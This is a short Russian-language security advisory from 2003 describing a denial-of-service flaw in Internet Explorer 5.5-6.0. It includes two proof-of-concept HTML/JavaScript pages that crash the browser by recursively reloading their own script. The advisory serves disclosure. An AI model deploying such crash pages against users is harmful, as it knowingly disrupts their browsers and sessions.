Security Lab

DoS портив Microsoft Internet explorer

Дата публикации:09.07.2003
Всего просмотров:1216
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость в обработке исключительных ситуаций обнаружена в Microsoft Internet explorer. Удаленный пользователь может аварийно завершить работу программы.

Следующий пример приведет к аварийному завершению работы программы:


--------------------[Crash.html]--------------------

window.moveTo(screen.width,screen.height);

document.all.tags("script")[0].src="Crash.html";

//<script src="Crash.html"></script>

-----------------[End of Crash.html]--------------- 
На результат влияют множество факторов – количество запущенных копий Internet explorer и символов в документе.

Например, если открыто только одно окно Internet explorer, то можно использовать следующий код, чтобы точно зафиксировать время аварии:

--------------------[Demo.html]--------------------

if(!window.counter)

{

	window.counter=1;

	alert("Internet Explorer will be crashed after 3-5 cycle");

}

window.counter++;

alert(window.counter);

document.all.tags("script")[0].src="demo.html";

//<script src="demo.html"></script>

-----------------[End of Demo.html]----------------
Работа IE аварийно завершится на 3-5 цикле программы.

Уязвимость обнаружена в Microsoft Internet explorer 5.5-6.0

Ссылки: Internet Explorer Crash